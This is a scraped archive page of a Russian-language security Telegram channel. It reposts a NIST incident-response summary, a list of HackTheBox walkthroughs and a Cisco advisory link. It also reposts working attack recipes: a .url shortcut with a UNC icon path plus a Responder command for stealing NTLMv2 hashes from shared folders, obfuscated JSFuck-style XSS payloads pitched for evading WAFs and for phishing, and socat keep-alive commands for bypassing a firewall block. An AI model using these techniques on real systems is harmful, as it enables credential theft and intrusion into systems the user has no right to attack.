Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 018
Obunachilar
-224 soatlar
+17 kunlar
-1430 kunlar
Postlar arxiv
2 018
Repost from Detection is easy
Всем привет! 💻✌️
Обратили внимание, что жизненный цикл реагирования на инциденты от NIST обновился в NIST.SP.800-61r3? Новая версия руководства интегрирована с Cybersecurity Framework (CSF) 2.0
На рисунке показана высокоуровневая модель жизненного цикла реагирования на инциденты, основанная на шести функциях:
- Управление (Govern): Стратегия, ожидания и политика организации в области управления рисками кибербезопасности устанавливаются, доводятся до сведения и отслеживаются
- Идентификация (Identify): анализируются текущие риски
- Защита (Protect): используются меры защиты для управления рисками
- Обнаружение (Detection): выявляются и анализируются возможные инциденты
- Реагирование (Respond): принимаются меры по реагированию в отношении обнаруженного инцидента
- Восстановление (Recover): восстанавливаются активы и процессы, затронутые инцидентом
Все шесть функций взаимосвязаны и формируют непрерывный процесс, где подготовка (управление, идентификация, защита) служит фундаментом для комплексной системы защиты.
Подготовка (управление, идентификация, защита) теперь выделена в отдельный этап, который не входит в процесс реагирования, но является основой для предотвращения инцидентов и снижения их последствий.
Реагирование (обнаружение, реагирование, восстановление) организовано как отдельный цикл, что связано с развитием MSSP (Managed Security Service Providers) и MDR (Managed Detection and Response). Эти сервисы позволяют организациям передать на аутсорс мониторинг и реагирование на инциденты, что особенно важно для малого и среднего бизнеса.
#dfir@detectioneasy
2 018
Repost from RedBlue Notes
Каждый кто увидит - окаменеет отдаст свой пароль
Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.Доброе утро! Сегодня расскажу о одном простом способе воровства NTLMv2 хэшей 1. Подготовка. Создаём интернет ярлык (.url), кстати, на такой файл НЕ будут жаловаться антивирусы 🙈
[InternetShortcut] URL=RedBlue WorkingDirectory=notes IconFile=\\172.16.71.71\%USERNAME%.icon IconIndex=12. Запускаем responder, что бы принимать хэши
sudo responder -I eth0Можете прятать такие файлы на общедоступных шарах, ловить хэши и горизонтально перемещатьсяХинт для синих👽:
Периодически проводите аудиты того, что лежит в шарах, а то вдруг кто-то положит .url или, может кто-то хранит password.txt 🤣Подписывайтесь на канал, дальше больше!
2 018
Repost from Pentest Notes
![Интересные XSS пейлоады подъехали 😊 ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا], د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+](data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+AjIqgtObDoKrarYqMyP/L2u71////m8H////6/+b9//j/2wBDASstLTw1PHZBQXb4pYyl+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj/wAARCAAZACgDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDPwCWOMD8aPk9R+tDRsWO1Tim+W+M7TQAZXPT9aTI/u/rRg0mDQADrRUh2kDCYP1optJdQDcPU0Fvc0lFIAooooAKKKKAP/9k=)
Интересные XSS пейлоады подъехали 😊
ا='',ب=!ا+ا,ت=!ب+ا,ث=ا+{},ج=ب[ا++],ح=ب[خ=ا],
د=++خ+ا,ذ=ث[خ+د],ب[ذ+=ث[ا]+(ب.ت+ث)[ا]+ت[د]+ج+ح+ب[خ]+ذ+ج+ث[ا]+ح][ذ](ت[ا]+ت[خ]+ب[د]+ح+ج+"(1)")()
甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('被攻擊了')"
)()
Как это вообще работает:
Идентификаторы в JavaScript могут содержать любые символы Unicode, поэтому можно использовать переменные с именами на арабском, русском, иероглифах, греческом и т.д. — это не меняет работу кода.
Сам код при этом собирается из базовых примитивов (булевых значений, пустых строк, объектов), а нужные строки и функции извлекаются посимвольно по индексам из этих примитивов. (Принцип JSFuck).
![] → false
!![] → true
+[] → 0
[]+[] → "" (пустая строка)
{}+[] и прочее дают строки вроде "[object Object]"
("false"+{})[1] → "a"
И так далее — по индексации из известных значений.
Полный перечень тут
Таким образом можно сделать payload, который выполнится в браузере, но при этом, вероятно, не будет детектиться многими WAF (Или при фишинге). Дипсику кстати понравилось, он всё скушал
Ps. для того чтобы пейлоад отработал, его нужно поместить в js контекст. Например, в тег <script>
💫 @pentestnotes2 018
Repost from s0i37_channel
Заметил как то забавную вещь. В ходе пентеста получаю уведомление от скрипта из предыдущего поста, что таргет заблокировал меня, проверяю - действительно порт стал закрыт, но dirsearch на этот таргет при этом продолжает работать. Как такое может быть?
Причина это Keep-alive, что использует соединение многократно. И как становится понятным фаерволы и waf могут ненадежно защищать цель, блокируя новые подключения, но забывая про уже установленные коннекты (скрин).
И вот как можно попробовать сделать bypass таких waf:
socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - tcp-connect:1.2.3.4:80,keepalive,keepidle=10,keepintvl=10,keepcnt=100 > /tmp/fifo
socat -v tcp-listen:1234,fork,reuseaddr - < /tmp/fifo | socat -v - openssl:1.2.3.4:443,verify=0 > /tmp/fifo
dirsearch -u http://127.0.0.1:12342 018
Repost from NetStalkers
💻 HackTheBox Walkthrough на русском языке, огромная практическая подборка прохождения машин от RalfHacker с Хабра
➡️ Hack The Box. Уровень Easy:
• Прохождение Traceback. Бэкдор, LUA, SSH.
• Прохождение Omni. Ломаем легенький Windows IoT.
• Прохождение Buff. RCE в CMS Gym и в CloudMe.
• Прохождение Tabby. RCE в Tomcat, и повышаем привилегии через LXD.
• Прохождение Blunder. Ломаем Bludit CMS.
• Прохождение Remote. NFS, RCE в CMS Umbraco и LPE через UsoSvc.
• Прохождение Sauna. LDAP, AS-REP Roasting, AutoLogon, DCSync атака.
• Прохождение Nest. NTFS потоки, реверс C# и бродилка по SMB.
• Прохождение Traverxec. RCE в веб-сервере nostromo, техника GTFOBins.
• Прохождение Forest. AS-REP Roasting, атаки DCSync и Pass-The-Hash.
• Прохождение Postman. Redis и WebMin.
➡️ Hack The Box. Уровень Medium:
• Прохождение лаборатории Professional Offensive Operations. Пентест Active Directory.
• Прохождение Monteverde. Брут SMB и LPE через Azure Admins.
• Прохождение OpenKeys. Ломаем виртуалку OpenBSD.
• Прохождение SneakyMailer. Фишинговая рассылка, LPE через PyPI и GTFOBins pip3.
• Прохождение Fuse. RPC, принтеры и опасная привилегия SeLoadDriverPrivilege.
• Прохождение Cache. RCE в OpenEMR, memcached и docker.
• Прохождение Admirer. Уязвимость в Admirer и RCE через подмену переменной среды.
• Прохождение Magic. Password spraying. Mysqldump и LPE через sysinfo.
• Прохождение Cascade. LDAP и удаленные объекты Active Directory.
• Прохождение Book. XSS to LFI через PDF и LPE через Logrotate.
• Прохождение Resolute. Password spraying. От DnsAdmin до SYSTEM.
• Прохождение Obscurity. OS Command Injection и Race Condition.
• Прохождение Mango. NoSQL инъекция и LPE через JJS.
• Прохождение Sniper. RFI и вредоносный CHM документ.
• Прохождение Bitlab. Слабая JS обфускация, GIT и реверс Windows приложения.
➡️ Hack The Box. Уровень Hard:
• Прохождение Compromised. RCE LiteCart и бэкдор pam_unix.
• Прохождение Unbalanced. Rsync, EncFS, Squid, XPath инъекция и RCE в Pi-hole.
• Прохождение Intanse. Flask, атака HLE, SQL инъекция, SNMP to RCE, Ret2Libc.
• Прохождение Blackfield. Захват контроллера домена через SMB и RPC, LPE через теневую копию.
• Прохождение Travel. Memcache+SSRF=RCE, LPE через LDAP.
• Прохождение Quick. QUIC HTTP/3, XSLT инъекция, Race condition.
• Прохождение Oouch. OAuth2, RCE в uWSGI и LPE через DBUS.
• Прохождение Forwardslash. LFI, backup и шифрованный том.
• Прохождение Control. SQL инъекция и LPE через права на службу.
• Прохождение Registry. Docker, RCE в CMS Bolt и Restic.
• Прохождение Scavenger. DNS, FTP и следы другого взлома.
• Прохождение Zetta. FXP, IPv6, rsync, Postgres и SQLi.
• Прохождение RE. Metasploit, нагрузка в офисном документе, Zip Slip атака, немного о PowerSploit и токенах.
➡️ Hack The Box. Уровень Insane:
• Прохождение Laser. Jetdirect, RPC и кража SSH.
• Прохождение Dyplesher. Memcached, Gogs, RCE через создание плагина и LPE через AMQP.
• Прохождение Multimaster. Burp+Sqlmap. AD users from MSSQL. Уязвимость в VSCode. AMSI bypass и CVE ZeroLogon.
• Прохождение Fatty. Реверс и рекомпиляция клиент-серверного приложения. Java десериализация.
• Прохождение PlayerTwo. Twirp, 2FA bypass, Off-By-One атака.
• Прохождение Rope. PWN. Форматные строки и ROP используя pwntools.
• Прохождение Bankrobber. XSS, SQL инъекция, CSRF, port forwarding.
#article #doc #pentest #redteam
2 018
Repost from Волосатый бублик
Если вы думаете что в пятницу можно уже расслабиться и готовиться к выходным, то вот вам работа:
Cisco Secure Firewall Management Center Software RADIUS Remote Code Execution Vulnerability
could allow an unauthenticated, remote attacker to inject arbitrary shell commands that are executed by the device
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79
